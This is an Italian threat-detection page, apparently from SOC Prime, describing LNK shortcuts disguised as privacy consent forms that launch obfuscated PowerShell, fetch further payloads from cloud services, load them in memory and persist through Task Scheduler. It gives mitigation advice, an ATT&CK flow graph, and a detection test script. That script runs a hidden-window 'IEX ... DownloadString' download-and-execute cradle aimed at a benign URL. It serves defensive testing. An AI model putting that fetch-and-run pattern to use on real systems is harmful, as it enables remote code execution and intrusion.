SOC Prime Bias: Alto

19 Jun 2026 07:26 UTC

Cosa C’era Davvero all’Interno del File di Scorciatoia Mascherato da Modulo di Consenso alla Privacy?

Author Photo
SOC Prime Team linkedin icon Segui
Cosa C’era Davvero all’Interno del File di Scorciatoia Mascherato da Modulo di Consenso alla Privacy?
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Gli attori della minaccia stanno distribuendo file LNK dannosi mascherati da moduli di consenso sulla privacy per ingannare gli utenti facendoli aprire. Quando eseguiti, questi file di scorciatoia lanciano comandi PowerShell offuscati che recuperano ed eseguono ulteriori payload utilizzando tecniche senza file. La catena di attacco è progettata per rubare informazioni e distribuire un caricatore di backdoor che aiuta a preservare l’accesso e la persistenza.

Indagine

L’indagine ha mostrato che i file LNK incorporano codice PowerShell offuscato responsabile del download di script successivi. Questi script secondari includono un downloader che preleva payload da servizi web legittimi e un caricatore che li esegue direttamente in memoria. L’attore della minaccia abusa anche del Task Scheduler di Windows per la persistenza e utilizza documenti esca per far apparire legittima l’attività dannosa.

Mitigazione

Le organizzazioni dovrebbero imporre una verifica rigorosa delle estensioni dei file e avvertire gli utenti sui file LNK mascherati da documenti regolari. I team di sicurezza dovrebbero monitorare da vicino l’attività del Task Scheduler, i log di esecuzione di PowerShell e le connessioni di rete in uscita. Gli utenti dovrebbero anche essere addestrati a convalidare sia il mittente sia il percorso di consegna di qualsiasi file in arrivo prima di aprirlo.

Risposta

Se viene rilevata quest’attività, gli amministratori dovrebbero immediatamente esaminare le voci sospette nel Task Scheduler e la creazione di script PowerShell insoliti nelle directory accessibili agli utenti. I log di PowerShell dovrebbero essere analizzati e le connessioni esterne tracciate, specialmente quelle che coinvolgono piattaforme cloud legittime o servizi di archiviazione web. Dovrebbe poi essere eseguita un’indagine forense completa su qualsiasi script dannoso identificato e sul traffico di rete non autorizzato.

graph TB %% Definizione delle classi classDef initial_access fill:#f96,stroke:#333,stroke-width:2px classDef execution fill:#69f,stroke:#333,stroke-width:2px classDef persistence fill:#6c6,stroke:#333,stroke-width:2px classDef discovery fill:#ff9,stroke:#333,stroke-width:2px classDef exfiltration fill:#f66,stroke:#333,stroke-width:2px %% Fase di accesso iniziale action_user_exec[“<b>Azione</b> – <b>T1204.002 User Execution: Malicious File</b><br/>La vittima esegue un file collegamento .LNK ingannevole<br/>camuffato come modulo di consenso.”] class action_user_exec initial_access action_masquerade[“<b>Azione</b> – <b>T1036.008 Masquerading: Masquerade File Type</b><br/>Il file .LNK imita un modulo legittimo<br/>di consenso per informazioni personali.”] class action_masquerade initial_access %% Fase di esecuzione action_obfuscation[“<b>Azione</b> – <b>T1027.009 Obfuscated Files or Information: Embedded Payloads</b><br/>Il file .LNK contiene un payload<br/>di script PowerShell offuscato.”] class action_obfuscation execution action_cloud_api[“<b>Azione</b> – <b>T1059.009 Command and Scripting Interpreter: Cloud API</b><br/>Lo script PowerShell utilizza servizi cloud<br/>per scaricare script dannosi aggiuntivi.”] class action_cloud_api execution action_proxy_exec[“<b>Azione</b> – <b>T1216 System Script Proxy Execution</b><br/>Il malware utilizza l’esecuzione proxy<br/>di script di sistema per mantenere un basso profilo.”] class action_proxy_exec execution action_reflective_load[“<b>Azione</b> – <b>T1620 Reflective Code Loading</b><br/>Gli script scaricati vengono eseguiti in memoria<br/>utilizzando metodi fileless.”] class action_reflective_load execution %% Fase di persistenza action_scheduled_task[“<b>Azione</b> – <b>T1053 Scheduled Task/Job</b><br/>Un’attività viene registrata nell’Utilità di pianificazione di Windows<br/>per garantire l’esecuzione dopo il riavvio.”] class action_scheduled_task persistence %% Fase di scoperta action_sys_info[“<b>Azione</b> – <b>T1082 System Information Discovery</b><br/>Lo script PowerShell raccoglie dettagli del sistema operativo,<br/>impostazioni di rete e indirizzi IP.”] class action_sys_info discovery action_query_reg[“<b>Azione</b> – <b>T1012 Query Registry</b><br/>Lo script interroga il registro per identificare<br/>processi in esecuzione e prodotti di sicurezza.”] class action_query_reg discovery %% Fase obiettivo action_backdoor[“<b>Azione</b> – <b>Backdoor loader-type</b><br/>Mantiene l’accesso e consente ulteriori<br/>attività dannose.”] class action_backdoor exfiltration action_selective_exclusion[“<b>Azione</b> – <b>T1679 Selective Exclusion</b><br/>La backdoor consente esclusioni selettive<br/>per aggirare i controlli di sicurezza.”] class action_selective_exclusion exfiltration %% Flusso delle connessioni action_user_exec –>|porta_a| action_masquerade action_masquerade –>|attiva| action_obfuscation action_obfuscation –>|contiene| action_cloud_api action_cloud_api –>|distribuisce| action_proxy_exec action_proxy_exec –>|esegue| action_reflective_load action_reflective_load –>|stabilisce| action_scheduled_task action_scheduled_task –>|esegue| action_sys_info action_sys_info –>|porta_a| action_query_reg action_query_reg –>|fornisce_informazioni| action_backdoor action_backdoor –>|abilita| action_selective_exclusion

Flusso di Attacco

Esecuzione Simulazione

Prerequisito: il controllo di pre-volo Telemetria e Baseline deve essere passato.

Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrativa & Comandi di Attacco: L’avversario cerca di stabilire l’accesso iniziale e scaricare un payload di malware di secondo stadio. Per evitare il rilevamento da parte di scanner di file semplici, utilizzano un file LNK (scorciatoia). Questo file LNK è progettato per eseguire powershell.exe in una finestra nascosta. Il comando passato a PowerShell utilizza Invoke-Expression and DownloadString per ottenere uno script da un URL remoto. Questo imita attacchi “Living-off-the-Land” (LotL) del mondo reale dove binari legittimi vengono utilizzati per eseguire azioni dannose, cercando di bypassare gli antivirus tradizionali basati su firme.

  • Script di Test di Regressione:

    # 1. Definire l'URL di destinazione (utilizzando un sito benigno per il test)
    $url = "https://www.google.com"
    
    # 2. Creare la stringa payload di PowerShell dannosa
    # Questa stringa è progettata per attivare il rilevamento 'DownloadString' e 'Invoke-Expression'
    $payload = "IEX (New-Object Net.WebClient).DownloadString('$url')"
    
    # 3. Creare un contenuto di file LNK falso (Simulato)
    # In un attacco reale, questo sarebbe un file .lnk binario.
    # Qui eseguiamo il comando direttamente per garantire che il log dello ScriptBlock sia generato per la convalida.
    Write-Host "[+] Simulazione dell'esecuzione PowerShell dannosa tramite payload LNK..."
    powershell.exe -WindowStyle Hidden -Command $payload
    
    Write-Host "[+] Comando di simulazione eseguito. Controlla l'ID evento 4104."
  • Comandi di Pulizia:

    # Rimuovere eventuali artefatti se i file sono stati creati
    Remove-Item -Path "$HOMEDesktopSimulated_Malicious_LNK.lnk" -ErrorAction SilentlyContinue
    Write-Host "[+] Pulizia completata."